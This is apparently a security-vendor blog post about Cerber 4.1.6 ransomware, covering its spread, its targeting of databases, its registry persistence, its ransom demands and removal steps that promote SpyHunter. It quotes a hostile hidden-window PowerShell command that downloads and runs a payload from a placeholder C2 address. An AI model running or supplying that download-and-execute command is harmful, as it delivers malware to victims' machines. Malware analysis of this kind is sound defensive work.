And just when we thought the Cerber variants of its 4th version were over, the main competitors of Locky ransomware have surpised us with 4.1.6 iteration. The version does not include major improvements, but a new wallpaper as well as new distribution websites featured. Another new improvement in this version is that Cerber 4.1.6 is now more focused on encrypting databases, due to their higher importance for organizations, in case an enterprise computer is infected. After the 4.1.6 version of Cerber ransomware infects your computer, the virus immediately renders the files encrypted using a strong encryption algorithm. This is done with the purpose to get users to visit a web page promoting a Cerber decryptor for a payment in BitCoin in return for the decryption keys for the encrypted files uniquely generated for the specific infection. In case you have become a victim by this new form of online extortion. We advise you to be very cautious in your future moves and read this article.
Threat Summary
| Name | Cerber 4.1.6 |
| Type | Ransomware |
| Short Description | The malware encrypts users files using a strong encryption algorithm, making direct decryption possible only via a unique decryption key available to the cyber-criminals. |
| Symptoms | The user may witness ransom notes and “instructions” linking to a web page and a decryptor. Changed file names and random file-extension has been used. |
| Distribution Method | Via an Exploit kit, Dll file attack, malicious JavaScript or a drive-by download of the malware itself in an obfuscated manner. |
| Detection Tool | See If Your System Has Been Affected by Cerber 4.1.6 Download Malware Removal Tool |
| User Experience | Join our forum to Discuss Cerber 4.1.6. |
| Data Recovery Tool | Windows Data Recovery by Stellar Phoenix Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive. |
Cerber 4.1.6 – What Is New
New Infection Strategy
When we take a look at the version 4 of Cerber ransomware, most of its sub versions (4.1.0, 4.1.1, 4.1.3, 4.1.4, 4.1.5) use e-mails and spam of malicious URLs on websites and other places to distribute and infect unsuspecting users. The 4.1.6 iteration of Cerber, however may have undertaken a different approach when it comes to infection, combining all types of distribution techniques together. Below, from the first Cerber detections, we see a sample which uses a fake portable Firefox web browser executable to cause an infection:
This strategy is very clever and torrent engines may be used to distribute it. Hackers go as far as even hacking accounts of 5 star uploaders on torrent websites to upload torrents that only pretend to be legitimate software but may in fact slither the 4.1.6 as well as the other versions of Cerber. This is because the network of Cerber ransomware is used as RaaS(Ransowmare as a service) and there are a lot of different individuals who are distributing the ransomware via different type of spam campaigns.
Cerber 4.1.6 Now More Focused on Databases
Since databases are mainly very important for organizations, Cerber was recently reported by researchers to be focused on attacking more and more forms of databases that exist out there. The primary reason for this is that the cyber-criminals generate a lot of profit by encrypting files of higher importance. Not only this but the 4.1.6 version may execute a batch (.bat) file that will immediately close the database process in case it is running in order to encode the database. Here are some examples, provided by Microsoft of the taskkill command’s uses, Cerber 4.1.6 may undertake:
→ taskkill /pid 1230 /pid 1241 /pid 1253
taskkill /f /fi “USERNAME eq NT AUTHORITY\SYSTEM” /im notepad.exe
taskkill /s srvmain /f /im notepad.exe
taskkill /s srvmain /u maindom\hiropln /p [email protected] /fi “IMAGENAME eq note*” /im *
taskkill /s srvmain /u maindom\hiropln /fi “USERNAME ne NT*” /im *
taskkill /f /fi “PID ge 1000” /im *
Further research also suggests that the 4.16 iteration of Cerber may target the following types of databases:
- Microsoft Access.
- Oracle.
- MySQL.
Unlike other ransomware viruses that primarily focus on targeting pictures, documents, videos and audio files, the Cerber family of viruses is primarily focused on targeting databases now.
How Does Cerber 4.1.6 Work
Similar to the other versions of the ransomware, once its malicious file has been executed on the user’s computer, it uses obfuscation to avoid detection by any antivirus programs. This is performed by a powershell command allowing the concealed download and starting of a malicious process, most likely located in the %AppData% directory:
→PS C:\Users\{Username}> POWERSHELL.EXE –window hidden (New-Object System.net.WebClient).DownloadFile(‘http://{malicious cerber c2 ip}~trevor/winx64.exe’,”$env:APPDATA\winx64.exe);Start-Process (“$env:APPDATA\winx64.exe”)
After the malicious executable is download and launched it may tamper with key registry sub-keys and add custom registry values in them to cause the encryption process to be uninterrupted and quiet and make Cerber 4.1.6 assume control of the components it needs for it to perform.
→HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
→HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
→HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
→HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
→HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
→HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
→HKEY_LOCAL_MACHINE\Software\Classes
→HKEY_CURRENT_USER\Software\Classes
→HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
After the encryption process has been finished, the 4.1.6 version drops a “readme.hta”(HTML) ransom note file and changes the wallpaper to the traditional Cebrer screen:
The note and the wallpaper both point out the Cerber Decryptor web page, which explains the situation to the victim:
What is different here is that this version of Cerber demands a significantly higher payment amount then the previous iterations – If $499 USD in BTC is not paid in time, the price for the decryption of the files increases to $999.
Cerber 4.1.6 – What to Do If I am Infected
In case you have become an unfortunate victim of this variant of Cerber, we strongly advise you to use the option on the ransom web page to decrypt one file for free:
Since paying the ransom is strongly not recommended , experts advise that you should backup the encrypted files on an external drive and instead of paying the ransom remove the virus using the information from the removal instructions below. For maximum effectiveness we advise you to take into consideration removing Cerber automatically with an anti-malware software.
After you have removed Cerber, we advise you to attempt alternative methods to restore your files such as the ones which are posted in step “2. Restore files encrypted by Cerber 4.1.6” below. They may not be 100% a solution, but they are a good temporary alternatives until malware researchers come up with a decryptor, just like what happened with the first version of Cerber last year. We will update this article with more information and a link to a decryptor as soon as it becomes available and this is why we advise you to check this web page regularly.
Note! Your computer system may be affected by Cerber 4.1.6 and other threats.
Scan Your PC with SpyHunter
SpyHunter is a powerful malware removal tool designed to help users with in-depth system security analysis, detection and removal of threats such as Cerber 4.1.6.
Keep in mind, that SpyHunter’s scanner is only for malware detection. If SpyHunter detects malware on your PC, you will need to purchase SpyHunter’s malware removal tool to remove the malware threats. Read our SpyHunter 5 review. Click on the corresponding links to check SpyHunter’s EULA, Privacy Policy and Threat Assessment Criteria.
To remove Cerber 4.1.6 follow these steps:
1. For Windows XP, Vista and 7.
2. For Windows 8, 8.1 and 10.
Fix registry entries created by malware and PUPs on your PC.
Use SpyHunter to scan for malware and unwanted programs
1. Install SpyHunter to scan for Cerber 4.1.6 and remove them.
Back up your data to secure it from malware in the future.
